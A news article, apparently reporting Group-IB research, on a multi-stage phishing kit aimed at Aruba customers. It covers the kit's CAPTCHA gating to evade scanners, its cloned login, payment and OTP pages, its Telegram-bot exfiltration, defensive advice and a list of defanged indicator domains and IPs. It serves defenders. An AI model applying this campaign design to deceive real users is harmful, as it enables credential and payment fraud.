A Multi-Stage Telegram Phishing Framework for Credential Theft and Detection Bypass

Phishing attacks have evolved far beyond basic email scams, now leveraging advanced frameworks and automated tools that easily bypass conventional defenses.

Group-IB’s recent research on an industrialized phishing kit targeting the Italian IT giant Aruba S.p.A. demonstrates this shift, highlighting the rise of phishing-as-a-service (PhaaS) and the increasing sophistication of the criminal ecosystem.

Multi-Stage Automation and Detection Evasion

This sophisticated phishing campaign typically starts with spear-phishing emails sent to Aruba customers, creating urgency by claiming services are expiring or payments have failed.

The emails link to flawlessly cloned login pages that pre-fill the victim’s email address, making the deception especially convincing. The attack unfolds in several stages, beginning with a CAPTCHA challenge that filters out security scanners and bots, ensuring only genuine users progress further.

After solving the CAPTCHA, victims are led through high-fidelity replicas of Aruba’s login and payment portals. Credentials are harvested first, followed by a fake payment request soliciting complete card information for a small, plausible renewal fee.

The final step presents a counterfeit 3D Secure or OTP input form, engineered to capture one-time codes sent by banks, allowing criminals to authorize fraudulent financial transactions immediately.

After each stage, victims are redirected to the legitimate Aruba website, reducing the likelihood that they realize their data has been stolen.

Telegram-Centric Infrastructure and Response

Central to this campaign’s success is the integration of Telegram as both a control hub and an exfiltration platform. Each piece of stolen information is instantly sent to attackers’ Telegram bots, with backup mechanisms saving data locally if the primary exfiltration fails.

Telegram is also used to distribute and sell phishing kits and to facilitate support and collaboration among cybercriminals, mimicking legitimate software-as-a-service businesses in structure and scale.

The ease of automation and mass availability means even less technically skilled criminals can conduct advanced attacks.

To defend against these threats, organizations should implement secure email gateways, adopt email authentication standards, monitor and report on phishing domains, and adopt zero-trust network strategies.

End users are urged to verify suspicious messages independently, avoid clicking on unsolicited links, and enable the strongest form of multi-factor authentication available, such as passkeys over SMS codes.

This industrialization of phishing demands an equally disciplined and intelligence-driven response from defenders, as attacks increasingly resemble agile, well-supported enterprises.

Indicators of Compromise (IOCs)

Network IOCs

Domain	IP
serdegogozedeytid[.]bulkypay[.]xyz	23[.]239[.]109[.]118
serdegogozedeytidtelerstore[.]marina[.]am	192[.]250[.]229[.]24
scarecrow[.]metalseed[.]you2[.]pl	109[.]95[.]159[.]70
wordpress-1512889-5811853[.]cloudwaysapps[.]com	45[.]77[.]157[.]140
firsijdaeeuetevcbcsj[.]cfolks[.]pl	185[.]208[.]164[.]121
arb-app[.]nero-network[.]eu	185[.]25[.]23[.]155
srv229641[.]hoster-test[.]ru	31[.]28[.]24[.]131

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post A Multi-Stage Telegram Phishing Framework for Credential Theft and Detection Bypass appeared first on Cyber Security News.